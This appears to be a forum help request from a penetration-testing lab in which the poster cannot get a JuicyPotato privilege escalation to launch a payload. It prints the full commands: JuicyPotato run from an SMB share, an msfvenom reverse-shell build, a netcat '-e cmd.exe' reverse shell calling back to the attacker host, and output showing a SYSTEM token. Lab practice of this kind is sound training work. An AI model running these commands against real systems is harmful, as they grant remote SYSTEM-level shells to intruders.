Hello friends,
So I’m trying really hard to get a precompiled x86 juicypotato (I’m too dumb to compile it myself) privesc executing a shell, but all I get is this:
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\shell-x86_2.exe
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\shell-x86_2.exe
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 9500
......
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
The shell was generated with this:
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.10 LPORT=5556 -f exe > shell-x86_2.exe
And I’m running the multihandler to get my shell:
windows/generic/shell_reverse_tcp
lhost: 10.10.14.10
lport: 5556
But I tried it with netcat as well:
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\nc.exe -a "-e cmd.exe 10.10.14.10 5557
Listener: nc -lnvp 5557
It seems that it’s working (all the time, actually), but it NEVER runs my executable afterwards, regardless of where the executable is (local or via an SMB share).
What am I doing wrong?